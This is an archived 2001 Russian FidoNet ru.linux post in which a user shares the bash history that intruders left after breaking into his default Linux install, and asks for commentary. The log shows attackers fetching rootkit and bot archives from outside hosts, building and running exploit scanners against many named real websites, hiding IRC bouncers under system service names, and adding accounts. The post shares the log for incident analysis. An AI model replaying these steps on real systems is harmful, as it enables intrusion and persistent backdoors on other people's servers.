|
ru.linux
- RU.LINUX ---------------------------------------------------------------------
From : Igor Beskrovny 2:4613/4.1 01 Sep 2001 13:30:00
To : Alexander Stavitsky
Subject : Re: Рaзбор полетов хaкеров
--------------------------------------------------------------------------------
Приветствую, Alexander!
01 сент 2001г. (сб) в 01:51 Alexander Stavitsky писал Igor Beskrovny:
IB>> чем можно поменять aтрибуты пропaтченных фaйлов? Если кому
IB>> интересно - могу кинуть сюдa bash_history взломa Они зa собой не
IB>> почистили :-)
AS> Очень охотa взглянуть... Ибо пpaктически все мы тут под rh-like
AS> системaми ходим. plz!
Хоть некоторый народ и писал что не стоит кидать, "Пособие для юных хакеров"
дальше четвертой строчки они не пройдут :-)
Просто после десятой просьбы отослать историю я подумал что народу это всетаки
интересно и полезно.
Я из той местности уехал, где машина стоит и инсталил ее на выходных, когда к
родителям приезжал. Соответственно вопросам защиты внимание не уделялось вообще.
Ставился туда PostgreSQL сервер в расчете что может потом пригодится, но был не
запущен.Во время инсталляции он генерит пользователя postgres.
Ломали через ftp в течении пол дня с нескольких машин в индонезии. Потом зашли
этим пользователем через telnet. Если кто квалифицировано прокоментирует что они
делали мне будет тоже интересно :-)
Hичего особенно крутого они не делали. Hо вся процедура заняла у них пол дня.
Это пример того насколько дырява система при установке стандартного
дистрибутива.
uname -a
mkdir ...
cd ...
cat >> term.sh
pwd
ls -l
chmod +x term.sh
exit
cat /etc/passwd
su okie
okiedookie
cd ...
w
lynx http://www.multimania.com/haxor/luckroot.tar
ls -l
rm login term.sh
ls -l
tar -xvf luckroot.tar
cd luckroot
ls -l
gcc -o luckscan-a luckscan-a.c
./luckgo 204
cd ...
lynx http://www.multimedia.com/haxor/bot.tgz
ls -l
rm luckroot.tar
rm -r luckroot
passwd
w
ls -l
su okie
su okie
su okie
su okie
w
su okie
locate libtcl.so
whereis libtcl.so
locate libtcl.h
mkdir ...
cd ...
lynx ftp://ftp.eggheads.org/pub/eggdrop/source/1.4/eggdrop1.4.5.tar.gz
tar -zxvf eggdrop1.4.5.tar.gz 1.4.5.tar.gz ; mv eggdrop1.4.5 egg ; cd egg ;
./configure ; make
ls
tar -zxvf eggdrop1.4.5.tar.gz
mv eggdrop1.4.5 egg
cd egg
./configure
cd ..
ftp 209.202.156.231
w
ps
ftp 202.185.85.171
cd /home
ls
pwd
cd /usr/sbin
adduser
./adduser
w
./adduser -u
./adduser -u -sky
./adduser -u sky
ftp 202.185.85.171
exit
cd ...
ftp box4.magixspeed.com
e
tar -zxvf psyBNC2.2.2.tar.gz ; mv psybnc inetd ; cd inetd ; make ; mv psybnc
httpd
PATH="./:$PATH"
htppd
ls
pico psybnc.conf
PATH="./:$PATH"
httpd
pico psybnc.conf
killall -9 httpd
httpd
exit
pwd
ftp 202.185.85.171
ls
./sky -c 202.185.85.171
gcc -o sky sky.c
ls
s./sky
./sky
./sky -c 202.185.85.171
ftp 202.185.85.171
ls
gcc -o lpd lpd.c
./lpd
perl sky.pl www.iesa.edu.ve:80 /inetpub
./sky -c www.techvision2020.org
./sky -c www.techvision2020.org
./lpd
./lpd www.fatfantasy.net brute -t 0
./lpd www.ntv7.com.my brute -t 0
w
./sky -c www.watchnet.com.tw
./sky -c www.ptt.com.tw
./sky -c www.eztour.com.tw
./sky -f www.eztour.com.tw
perl sky.pl www.putra.net.my:80 /inetpub
perl sky.pl www.cyberfield.net:80 /inetpub
perl sky.pl www.hijrah.com.my:80 /inetpub
perl sky.pl www.sen.com.my:80 /inetpub
ls
perl sky.pl www.novell.com.my:80 /inetpub
perl sky.pl www.ghl:80 /inetpub
perl sky.pl www.ghl.com:80 /inetpub
perl sky.pl www.nurshahila.com:80 /inetpub
perl sky.pl www.putra.com.my:80 /inetpub
exit
w
cd ...
ls -l
cd inetd
ls -l
cd
ls -l
cat sky.pl
ls -l
cat sky.c | more
w
cat lpd.c | more
ls -l
w
cp sky.pl sky.txt
rm sky.txt
cp upload.asp upload.txt
w
finger bisadm
rm upload.txt
ls -l
ls -laF
cd ...
ls -l
cd egg
ls -l
w
exit
ls -l
perl sky.pl 206.58.151.199:80 'c:\inetpub\wwwroot'
ls -l
cat sky.pl | more
+ls -l
ls -l
cat upload.inc
С уважением,
Б.И.С.
--- GoldED 2.50.B1016+
* Origin: БИСов домик mailto: bis@pi.net.ua (2:4613/4.1)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
|
